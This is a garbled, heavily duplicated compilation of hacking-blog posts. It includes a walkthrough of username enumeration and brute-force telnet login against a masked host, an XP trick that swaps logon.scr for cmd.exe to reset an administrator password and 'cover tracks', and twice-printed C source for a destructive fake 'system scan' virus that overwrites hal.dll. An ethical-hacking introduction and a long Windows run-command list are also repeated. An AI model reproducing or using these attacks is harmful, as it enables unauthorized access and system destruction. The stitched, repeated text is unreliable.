Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0
login:
We telnet to port 25, and find that there are no mail daemon running - no EXPN or VFRY possibilities. It seems that there are no anonymous FTP - no getting the password file. The finger daemon is also not running. Let us leave this host alone - we don't want to offend XXX - they have implemented some measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is running Sendmail and finger. When we do a finger command, we find many usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk '{print $1}' | uniq > usernames
The next step would be to see if can use these usernames with common passwords. We use VLAD's brute force telnet module as follows:
perl pwscan.pl -v -T 216.xxx.140.132,
with the usernames in the file account.db. The output of the pwscan.pl PERL script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v
loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test
---cut---
Running through all usernames and common passwords, we find ..nothing. No username could be brute forced. Now what? The next step is to find more usernames. We attempt to the following:
finger test@216.xxx.140.132
The output looks like this:
- 37 - Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
/tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.
Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
pts038
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password - we test it manually. The "monotest" user however delivers...logging in with username "monotest", and password "monotest" we gain access to the UNIX host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp
RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.
NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns all usernames that contains the word "test". In the same way we can finger users such as "admin", and "user", and get interesting results.
Most machines that are running telnet, and has more than a certain amount of users (mostly multi-user machines) almost always hosts users with weak or no passwords - the idea is just to find them. From here it is fairly certain that you will find a local SCO exploit that will elevate you to root.
XP HACK:ADMIN PASSWORD
If you looking for restoring win XP admin password:
WINDOWS TIPS COLLECTION
How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
WINDOWS TIPS COLLECTION
How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
/* STOSTER(VIRUS) BY SIBI CHAKKARAVARTHY. */ /*copy rights S-TECHNOLOGIES */
#include"dos.h"
#include"stdlib.h"
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OS CORRUPTION",choice;
void interrupt(void);///header
void findroot(void);
void showstatus(void);
void viral(void);
void accept(void);
void main()
{
viral();
accept();
textcolor(WHITE);
viral();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
if((choice=getch())!=13)
exit(0);
}
void viral()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
//cputs wit a destinater(anti virus) file..yet i ve removed in this......
}
void findroot()
// hal.dll----HARDWARE ABSTRACTION LAYER(dynamic linking library file)
{
t=fopen("C:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
/* started to ruin u r system......*/
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("D:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("E:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("F:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
return(1);
}
void interrupt()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
viral();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
#include"stdlib.h"
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OS CORRUPTION",choice;
void interrupt(void);///header
void findroot(void);
void showstatus(void);
void viral(void);
void accept(void);
void main()
{
viral();
accept();
textcolor(WHITE);
viral();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
if((choice=getch())!=13)
exit(0);
}
void viral()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
//cputs wit a destinater(anti virus) file..yet i ve removed in this......
}
void findroot()
// hal.dll----HARDWARE ABSTRACTION LAYER(dynamic linking library file)
{
t=fopen("C:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
/* started to ruin u r system......*/
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("D:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("E:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("F:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
return(1);
}
void interrupt()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
viral();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Wednesday, June 23, 2010
Understanding the Need to Hack Your Own Systems
Understanding the Need to
Hack Your Own Systems
To catch a thief, think like a thief. That’s the basis for ethical hacking.
The law of averages works against security. With the increased numbers and
expanding knowledge of hackers combined with the growing number of system
vulnerabilities and other unknowns, the time will come when all computer
systems are hacked or compromised in some way. Protecting your systems
from the bad guys — and not just the generic vulnerabilities that everyone
knows about — is absolutely critical. When you know hacker tricks, you can
see how vulnerable your systems are.
Hacking preys on weak security practices and undisclosed vulnerabilities.
Firewalls, encryption, and virtual private networks (VPNs) can create a false
feeling of safety. These security systems often focus on high-level vulnerabilities,
such as viruses and traffic through a firewall, without affecting how hackers
work. Attacking your own systems to discover vulnerabilities is a step to
making them more secure. This is the only proven method of greatly hardening
your systems from attack. If you don’t identify weaknesses, it’s a matter of
time before the vulnerabilities are exploited.
As hackers expand their knowledge, so should you. You must think like them
to protect your systems from them. You, as the ethical hacker, must know
activities hackers carry out and how to stop their efforts. You should know
what to look for and how to use that information to thwart hackers’ efforts.
You don’t have to protect your systems from everything. You can’t. The only
protection against everything is to unplug your computer systems and lock
them away so no one can touch them — not even you. That’s not the best
approach to information security. What’s important is to protect your systems
from known vulnerabilities and common hacker attacks.
It’s impossible to buttress all possible vulnerabilities on all your systems. You
can’t plan for all possible attacks — especially the ones that are currently
unknown. However, the more combinations you try — the more you test whole
systems instead of individual units — the better your chances of discovering
vulnerabilities that affect everything as a whole.
Don’t take ethical hacking too far, though. It makes little sense to harden your
systems from unlikely attacks. For instance, if you don’t have a lot of foot traffic
Introduction to Ethical Hacking
in your office and no internal Web server running, you may not have as much
to worry about as an Internet hosting provider would have. However, don’t
forget about insider threats from malicious employees!
Your overall goals as an ethical hacker should be as follows:
Hack your systems in a nondestructive fashion.
Enumerate vulnerabilities and, if necessary, prove to upper management
that vulnerabilities exist.
Apply results to remove vulnerabilities and better secure your systems.
Hack Your Own Systems
To catch a thief, think like a thief. That’s the basis for ethical hacking.
The law of averages works against security. With the increased numbers and
expanding knowledge of hackers combined with the growing number of system
vulnerabilities and other unknowns, the time will come when all computer
systems are hacked or compromised in some way. Protecting your systems
from the bad guys — and not just the generic vulnerabilities that everyone
knows about — is absolutely critical. When you know hacker tricks, you can
see how vulnerable your systems are.
Hacking preys on weak security practices and undisclosed vulnerabilities.
Firewalls, encryption, and virtual private networks (VPNs) can create a false
feeling of safety. These security systems often focus on high-level vulnerabilities,
such as viruses and traffic through a firewall, without affecting how hackers
work. Attacking your own systems to discover vulnerabilities is a step to
making them more secure. This is the only proven method of greatly hardening
your systems from attack. If you don’t identify weaknesses, it’s a matter of
time before the vulnerabilities are exploited.
As hackers expand their knowledge, so should you. You must think like them
to protect your systems from them. You, as the ethical hacker, must know
activities hackers carry out and how to stop their efforts. You should know
what to look for and how to use that information to thwart hackers’ efforts.
You don’t have to protect your systems from everything. You can’t. The only
protection against everything is to unplug your computer systems and lock
them away so no one can touch them — not even you. That’s not the best
approach to information security. What’s important is to protect your systems
from known vulnerabilities and common hacker attacks.
It’s impossible to buttress all possible vulnerabilities on all your systems. You
can’t plan for all possible attacks — especially the ones that are currently
unknown. However, the more combinations you try — the more you test whole
systems instead of individual units — the better your chances of discovering
vulnerabilities that affect everything as a whole.
Don’t take ethical hacking too far, though. It makes little sense to harden your
systems from unlikely attacks. For instance, if you don’t have a lot of foot traffic
Introduction to Ethical Hacking
in your office and no internal Web server running, you may not have as much
to worry about as an Internet hosting provider would have. However, don’t
forget about insider threats from malicious employees!
Your overall goals as an ethical hacker should be as follows:
Hack your systems in a nondestructive fashion.
Enumerate vulnerabilities and, if necessary, prove to upper management
that vulnerabilities exist.
Apply results to remove vulnerabilities and better secure your systems.
Windows Run Commands
Wanted to Browse fast in windows. Remember these commands.
This will really save a lot of time of your. There are many
Commands which you might have never seen or never knew.
There are certain properties of windows which you hardly know
Exist in windows. Here is a list of 112 run commands.
Windows Run Commands
Accessibility Controls---- --- access.cpl
Add Hardware Wizard------ - hdwwiz.cpl
Add/Remove Programs---- --- appwiz.cpl
Administrative Tools------- control admintools
Automatic Updates----- -- wuaucpl.cpl
Bluetooth Transfer Wizard------ - fsquirt
Calculator-- ----- calc
Certificate Manager certmgr.msc
Character Map charmap
Check Disk Utility----- -- chkdsk
Clipboard Viewer------ - clipbrd
Command Prompt------ - cmd
Component Services---- --- dcomcnfg
Computer Management-- ----- compmgmt.msc
Timedate.cpl- ------ ddeshare
Device Manager----- -- devmgmt.msc
Direct X Control Panel (If Installed)*- ------ directx.cpl
Direct X Troubleshooter- ------ dxdiag
Disk Cleanup Utility----- -- cleanmgr
Disk Defragment-- ----- dfrg.msc
Disk Management-- ----- diskmgmt.msc
Disk Partition Manager----- -- diskpart
Display Properties-- ----- control desktop
Display Properties-- ----- desk.cpl
Display Properties (w/Appearance Tab Preselected) ------- control color
Dr. Watson System Troubleshooting Utility----- -- drwtsn32
Driver Verifier Utility----- -- verifier
Event Viewer------ - eventvwr.msc
File Signature Verification Tool------- sigverif
Findfast---- --- findfast.cpl
Folders Properties-- ----- control folders
Fonts------- control fonts
Fonts Folder------ - fonts
Free Cell Card Game------- freecell
Game Controllers- ------ joy.cpl
Group Policy Editor (XP Prof)------- gpedit.msc
Hearts Card Game------- mshearts
Iexpress Wizard------ - iexpress
Indexing Service----- -- ciadv.msc
Internet Properties-- ----- inetcpl.cpl
IP Configuration (Display Connection Configuration) ------- ipconfig /all
IP Configuration (Display DNS Cache Contents)--- ---- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)--- ---- ipconfig /flushdns
IP Configuration (Release All Connections) ------- ipconfig /release
IP Configuration (Renew All Connections) ------- ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)------- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)------- ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)------- ipconfig /setclassid
Java Control Panel (If Installed) jpicpl32.cpl
Java Control Panel (If Installed)-- ----- javaws
Keyboard Properties-- ----- control keyboard
Local Security Settings---- --- secpol.msc
Local Users and Groups------ - lusrmgr.msc
Logs You Out Of Windows----- -- logoff
Microsoft Chat------- winchat
Minesweeper Game------- winmine
Mouse Properties-- ----- control mouse
Mouse Properties-- ----- main.cpl
Network Connections- ------ control netconnections
Network Connections- ------ ncpa.cpl
Network Setup Wizard------ - netsetup.cpl
Notepad----- -- notepad
Nview Desktop Manager (If Installed)-- ----- nvtuicpl.cpl
Object Packager---- --- packager
ODBC Data Source Administrator- ------ odbccp32.cpl
On Screen Keyboard---- --- osk
Opens AC3 Filter (If Installed)-- ----- ac3filter.cpl
Password Properties-- ----- password.cpl
Performance Monitor----- - perfmon.msc
Performance Monitor----- -- perfmon
Phone and Modem Options----- -- telephon.cpl
Power Configuration- ------ powercfg.cpl
Printers and Faxes------- control printers
Printers Folder------ - printers
Private Character Editor------ - eudcedit
Quicktime (If Installed)-- ----- QuickTime.cpl
Regional Settings---- --- intl.cpl
Registry Editor------ - regedit
Registry Editor------ - regedit32
Remote Desktop----- -- mstsc
Removable Storage----- -- ntmsmgr.msc
Removable Storage Operator Requests---- --- ntmsoprq.msc
Resultant Set of Policy (XP Prof)------- rsop.msc
Scanners and Cameras----- -- sticpl.cpl
Scheduled Tasks------- control schedtasks
Security Center------ - wscui.cpl
Services---- --- services.msc
Shared Folders----- -- fsmgmt.msc
Shuts Down Windows----- -- shutdown
Sounds and Audio------- mmsys.cpl
Spider Solitare Card Game------- spider
SQL Client Configuration- ------ cliconfg
System Configuration Editor------ - sysedit
System Configuration Utility----- -- msconfig
System File Checker Utility (Scan Immediately) ------- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)------- sfc /scanonce
System File Checker Utility (Scan On Every Boot)------- sfc /scanboot
System File Checker Utility (Return to Default Setting)---- --- sfc /revert
System File Checker Utility (Purge File Cache)------ - sfc /purgecache
System File Checker Utility (Set Cache Size to size x)------- sfc /cachesize=x
System Properties-- ----- sysdm.cpl
Task Manager----- -- taskmgr
Telnet Client------ - telnet
User Account Management-- ----- nusrmgr.cpl
Utility Manager----- -- utilman
Windows Firewall---- --- firewall.cpl
Windows Magnifier--- ---- magnify
Windows Management Infrastructure- ------ wmimgmt.msc
Accessibility Controls --------- access.cpl
Accessibility Wizard --------- accwiz
Add Hardware Wizard --------- hdwwiz.cpl
Add/Remove Programs --------- appwiz.cpl
Administrative Tools --------- control admintools
Adobe Acrobat (if installed) --------- acrobat
Adobe Designer (if installed) --------- acrodist
Adobe Distiller (if installed) --------- acrodist
Adobe ImageReady (if installed) --------- imageready
Adobe Photoshop (if installed) --------- Photoshop
Automatic Updates --------- wuaucpl.cpl
Bluetooth Transfer Wizard --------- fsquirt
Calculator --------- calc
Certificate Manager --------- certmgr.msc
Character Map --------- Charmap
Check Disk Utility --------- chkdsk
Clipboard Viewer --------- clipbrd
Command Prompt --------- cmd
Component Services --------- dcomcnfg
Computer Management --------- compmgmt.msc
Control Panel --------- control
Date and Time Properties --------- timedate.cpl
DDE Shares --------- ddeshare
Device Manager --------- devmgmt.msc
Direct X Control Panel (If Installed)* --------- directx.cpl
Direct X Troubleshooter --------- dxdiag
Disk Cleanup Utility --------- cleanmgr
Disk Defragment ------- dfrg.msc
Disk Management -------- diskmgmt.msc
Disk Partition Manager --------- diskpart
Display Properties ----------- control desktop
Display Properties ----------Desk. cpl
Display Properties (w/Appearance Tab Preselected) --------- control color
Dr. Watson System Troubleshooting Utility ------------ drwtsn32
Driver Verifier Utility ------------ verifier
Minesweeper Game -------- winmine
Mouse Properties --------- control mouse
Mouse Properties ---------- main.cpl
Nero (if installed) --------- nero
Netmeeting ------------ - conf
Network Connections ---------- control netconnections
Network Connections --------- ncpa.cpl
Network Setup Wizard ---------- netsetup.cpl
Notepad --------- notepad
Nview Desktop Manager (If Installed) ------- nvtuicpl.cpl
Object Packager ---------- packager
ODBC Data Source Administrator ------ odbccp32.cpl
On Screen Keyboard --------- osk
Opens AC3 Filter (If Installed) --------- ac3filter.cpl
Outlook Express ------------ - msimn
Paint ------------ pbrush
Password Properties -------- password.cpl
Performance Monitor ------- perfmon.msc
Performance Monitor --------- perfmon
Phone and Modem Options ------- telephon.cpl
Phone Dialer --------- dialer
Pinball Game ------------ --- pinball
Power Configuration --------- powercfg.cpl
Printers and Faxes ------- control printers
Printers Folder --------- printers
Private Character Editor --------- eudcedit
Quicktime (If Installed) --------- QuickTime.cpl
Quicktime Player (if installed) ------------ - quicktimeplayer
Real Player (if installed) ------------ - realplay
Regional Settings ----------- intl.cpl
Registry Editor --------- regedit
Registry Editor -------- regedit32
Remote Access Phonebook -------- rasphone
Remote Desktop --------- mstsc
Removable Storage --------- ntmsmgr.msc
Removable Storage Operator Requests --------- ntmsoprq.msc
Resultant Set of Policy (XP Prof) ---------- rsop.msc
Scanners and Cameras ------------ sticpl.cpl
Scheduled Tasks ----------- control schedtasks
Security Center ----------- wscui.cpl
Services ------------ -- services.msc
Shared Folders ----------- fsmgmt.msc
Shuts Down Windows ------- shutdown
Sounds and Audio ------------ mmsys.cpl
Spider Solitare Card Game -------- spider
SQL Client Configuration --------- cliconfg
System Configuration Editor --------- sysedit
System Configuration Utility --------- msconfig
System File Checker Utility (Scan Immediately) ---------- sfc /scannow
System File Checker Utility (Scan Once At Next Boot) ---------- sfc /scanonce
System File Checker Utility (Scan On Every Boot) ------------ -- sfc /scanboot
System File Checker Utility (Return to Default Setting) ----------- sfc /revert
System File Checker Utility (Purge File Cache) ------------ sfc /purgecache
System File Checker Utility (Set Cache Size to size x) ------------ sfc /cachesize=x
System Information ----------- msinfo32
System Properties --------- sysdm.cpl
Task Manager ------------ taskmgr
TCP Tester ------------ tcptest
Telnet Client --------- telnet
Tweak UI (if installed) ------------ tweakui
User Account Management ------------ nusrmgr.cpl
Utility Manager --------- utilman
Windows Address Book --------- wab
Windows Address Book Import Utility ----------- wabmig
Windows Backup Utility (if installed) ------------ ntbackup
Windows Explorer ------------ - explorer
Windows Firewall ---------- firewall.cpl
Windows Magnifier ------------ - magnify
Windows Management Infrastructure ----------- wmimgmt.msc
Windows Media Player ----------- wmplayer
Windows Messenger ------------ msmsgs
Windows Picture Import Wizard (need camera connected) --------- wiaacmgr
Windows System Security Tool ------- syskey
Windows Update Launches ------------ -- wupdmgr
Windows Version (to show which version of windows) --------- winver
Windows XP Tour Wizard ------------ - tourstart
Event Viewer ----------- eventvwr.msc
Files and Settings Transfer Tool ---------- migwiz
File Signature Verification Tool -------- sigverif
Findfast ---------- findfast.cpl
Firefox (if installed) -------- firefox
Folders Properties ---------- control folders
Fonts ---------- control fonts
Fonts Folder ------------ fonts
Free Cell Card Game ------- freecell
Game Controllers --------- joy.cpl
Group Policy Editor (XP Prof) --------- gpedit.msc
Hearts Card Game ----------- mshearts
Help and Support ------- helpctr
HyperTerminal ----------- hypertrm
Iexpress Wizard ---------- iexpress
Indexing Service ---------- ciadv.msc
Internet Connection Wizard -------- icwconn1
Internet Explorer ---------- iexplore
Internet Properties --------- inetcpl.cpl
Internet Setup Wizard ------- inetwiz
Java Control Panel (If Installed) --------- jpicpl32.cpl
Java Control Panel (If Installed) --------- javaws
Keyboard Properties ----------- control keyboard
Local Security Settings --------- secpol.msc
Local Users and Groups ------------ - lusrmgr.msc
Logs You Out Of Windows ---------- logoff
Malicious Software Removal Tool ----------- mrt
Microsoft Access (if installed) ------------ - access.cpl
Microsoft Chat ------------ - winchat
Microsoft Excel (if installed) ----------- excel
Microsoft Frontpage (if installed) ----------- frontpg
Microsoft Movie Maker ----------- moviemk
Microsoft Paint ------------ mspaint
Microsoft Powerpoint (if installed) --------- powerpnt
Microsoft Word (if installed) ---------- winword
Microsoft Syncronization Tool ---------- mobsync
This will really save a lot of time of your. There are many
Commands which you might have never seen or never knew.
There are certain properties of windows which you hardly know
Exist in windows. Here is a list of 112 run commands.
Windows Run Commands
Accessibility Controls---- --- access.cpl
Add Hardware Wizard------ - hdwwiz.cpl
Add/Remove Programs---- --- appwiz.cpl
Administrative Tools------- control admintools
Automatic Updates----- -- wuaucpl.cpl
Bluetooth Transfer Wizard------ - fsquirt
Calculator-- ----- calc
Certificate Manager certmgr.msc
Character Map charmap
Check Disk Utility----- -- chkdsk
Clipboard Viewer------ - clipbrd
Command Prompt------ - cmd
Component Services---- --- dcomcnfg
Computer Management-- ----- compmgmt.msc
Timedate.cpl- ------ ddeshare
Device Manager----- -- devmgmt.msc
Direct X Control Panel (If Installed)*- ------ directx.cpl
Direct X Troubleshooter- ------ dxdiag
Disk Cleanup Utility----- -- cleanmgr
Disk Defragment-- ----- dfrg.msc
Disk Management-- ----- diskmgmt.msc
Disk Partition Manager----- -- diskpart
Display Properties-- ----- control desktop
Display Properties-- ----- desk.cpl
Display Properties (w/Appearance Tab Preselected) ------- control color
Dr. Watson System Troubleshooting Utility----- -- drwtsn32
Driver Verifier Utility----- -- verifier
Event Viewer------ - eventvwr.msc
File Signature Verification Tool------- sigverif
Findfast---- --- findfast.cpl
Folders Properties-- ----- control folders
Fonts------- control fonts
Fonts Folder------ - fonts
Free Cell Card Game------- freecell
Game Controllers- ------ joy.cpl
Group Policy Editor (XP Prof)------- gpedit.msc
Hearts Card Game------- mshearts
Iexpress Wizard------ - iexpress
Indexing Service----- -- ciadv.msc
Internet Properties-- ----- inetcpl.cpl
IP Configuration (Display Connection Configuration) ------- ipconfig /all
IP Configuration (Display DNS Cache Contents)--- ---- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)--- ---- ipconfig /flushdns
IP Configuration (Release All Connections) ------- ipconfig /release
IP Configuration (Renew All Connections) ------- ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)------- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)------- ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)------- ipconfig /setclassid
Java Control Panel (If Installed) jpicpl32.cpl
Java Control Panel (If Installed)-- ----- javaws
Keyboard Properties-- ----- control keyboard
Local Security Settings---- --- secpol.msc
Local Users and Groups------ - lusrmgr.msc
Logs You Out Of Windows----- -- logoff
Microsoft Chat------- winchat
Minesweeper Game------- winmine
Mouse Properties-- ----- control mouse
Mouse Properties-- ----- main.cpl
Network Connections- ------ control netconnections
Network Connections- ------ ncpa.cpl
Network Setup Wizard------ - netsetup.cpl
Notepad----- -- notepad
Nview Desktop Manager (If Installed)-- ----- nvtuicpl.cpl
Object Packager---- --- packager
ODBC Data Source Administrator- ------ odbccp32.cpl
On Screen Keyboard---- --- osk
Opens AC3 Filter (If Installed)-- ----- ac3filter.cpl
Password Properties-- ----- password.cpl
Performance Monitor----- - perfmon.msc
Performance Monitor----- -- perfmon
Phone and Modem Options----- -- telephon.cpl
Power Configuration- ------ powercfg.cpl
Printers and Faxes------- control printers
Printers Folder------ - printers
Private Character Editor------ - eudcedit
Quicktime (If Installed)-- ----- QuickTime.cpl
Regional Settings---- --- intl.cpl
